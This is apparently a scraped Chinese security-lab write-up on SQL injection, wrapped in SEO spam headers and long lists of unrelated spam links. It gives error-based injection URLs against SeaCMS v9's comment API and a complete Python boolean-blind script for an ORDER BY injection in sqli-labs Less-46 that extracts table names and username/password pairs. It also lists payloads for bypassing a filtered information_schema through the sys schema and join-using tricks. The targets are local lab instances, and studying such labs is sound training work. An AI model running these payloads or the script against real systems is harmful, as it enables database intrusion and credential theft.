当前位置: 首页 > wzjs >正文

廊坊哪里有做网站建设的软件开发需要哪些软件

廊坊哪里有做网站建设的,软件开发需要哪些软件,软件开发包含哪些内容,怎么增加网站流量1、seacmsv9报错注入出管理员账号密码 注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php 注入点:&$rlist 经源代码分析,可用以下语句注入,得到用户名: http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid1&…
1、seacmsv9报错注入出管理员账号密码

注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php

注入点:&$rlist

经源代码分析,可用以下语句注入,得到用户名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

用以下语句注入出数据库名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`

用以下语句注入出表名:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`

结果注入失败

2、orderby的布尔盲注

布尔盲注:

import requests
from lxml import htmldef get_id_one(URL, paload):res = requests.get(url=URL, params=paload)tree = html.fromstring(res.content)id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()return id_one# 获取数据库名
def database(URL):dataname = ""for i in range(1, 10):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":hight = midmid = (low + hight) // 2else:low = mid + 1mid = (low + hight) // 2dataname += chr(mid)print(dataname)# 获取表名
def table_name(URL):tables = ""for i in range(1, 40):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2tables += chr(mid)print(tables)# 获取字段名
def column_name(URL):columns = ""for i in range(1, 25):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2columns += chr(mid)print(columns)# 获取数据
def datas(URl):data = ""for i in range(1, 50):low = 32hight = 128mid = (low + hight) // 2while (hight > low):paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}id_one = get_id_one(URL, paload)if id_one == "1":low = mid + 1mid = (low + hight) // 2else:hight = midmid = (low + hight) // 2data += chr(mid)print(data)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"database(URL)table_name(URL)column_name(URL)datas(URL)

结果:

3、过滤information_schema,如何解决
如果information_schema被过滤掉了,该如何查询数据方法一:利用sys数据库查看所有数据库名:
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;查看数据库中所有表名:
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';#sys.schema_auto_increment_columns 
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_table_index
#均可代替 information_schema方法二:无列名注入利用 join-using 注列名获取表名:
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+获取字段名:
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+

文章转载自:

http://AZ7U9Wmk.nccyc.cn
http://eQ8dPhJW.nccyc.cn
http://uBUTBXUW.nccyc.cn
http://QLFhsJcc.nccyc.cn
http://aCOcIfjG.nccyc.cn
http://zrG4kLLl.nccyc.cn
http://esmIvrfu.nccyc.cn
http://ZuLTJkbP.nccyc.cn
http://Q6wFeDBH.nccyc.cn
http://M5AFIBe4.nccyc.cn
http://r90nYknW.nccyc.cn
http://meEfILcO.nccyc.cn
http://Dy3jNY9m.nccyc.cn
http://rfgTJxVg.nccyc.cn
http://uKtc5GiN.nccyc.cn
http://QXaPX9xP.nccyc.cn
http://EgUt7Jfl.nccyc.cn
http://QcPYGUcv.nccyc.cn
http://lcZRDlvH.nccyc.cn
http://p3UuOcpt.nccyc.cn
http://QyFGcZFp.nccyc.cn
http://wW2KmRwJ.nccyc.cn
http://RSyWAkJP.nccyc.cn
http://7GrxFXX8.nccyc.cn
http://Lm9siPPL.nccyc.cn
http://7fhHkIy4.nccyc.cn
http://Pq4SY9Js.nccyc.cn
http://t30qCSxD.nccyc.cn
http://jIrhw4A7.nccyc.cn
http://F8UXgWK6.nccyc.cn
http://www.dtcms.com/wzjs/722330.html

相关文章:

  • 做网站所需知识网站域名续费多少钱
  • 什么系统做购物网站好购物中心设计
  • 网站源码com大全个人网站html模板下载
  • 合肥建网站公司地址近的中医小程序定制
  • 旅游门户网站建设方案包装公司logo设计
  • 成都交投成高建设公司网站做部队网站技术
  • 做网站是自己公司做好还是外包好html教程网
  • 成都建设网站的公司有哪些哪个推客平台最好
  • 展示网站如何做二级网站建设管理制度
  • 网站建设加推广优化中英文企业网站制作
  • seo网站建设接单百度搜索引擎优化指南最新版
  • 昌邑建设网站wordpress google 慢
  • 网站建设费账务处理商品推广软文范例200字
  • 做简单网站后端需要学什么开发网站
  • html5 网站开发定制销售手机网站
  • 给公司做个网站多少钱四川省城乡和住房建设厅网站
  • 网站已改版网站推广软文代发
  • 基于html5的旅游网站的设计优秀国内个人网站网址
  • 住房和城建设网站wordpress修改访问量
  • 做啥网站桥头网站建设
  • 网站开发一般要哪些开发工具国家企业信息信用信息公示网山东
  • 如何创建一个自己公司网站房子装修设计图片大全
  • 传统媒体网站建设响应式网站 框架
  • 赣州门户网站外贸跨境电商平台有哪些
  • 做网站滨州市公司做网站的费用记什么科目
  • 网站开发企业标准电子网站模板
  • 企业网站建设公司注意哪些问题综合搜索引擎
  • 二级学院网站建设自评报告网站怎么做关键词研究
  • 英文建站网站手机非法网站怎么解决方案
  • 沧州网站的公众号织梦怎么关闭网站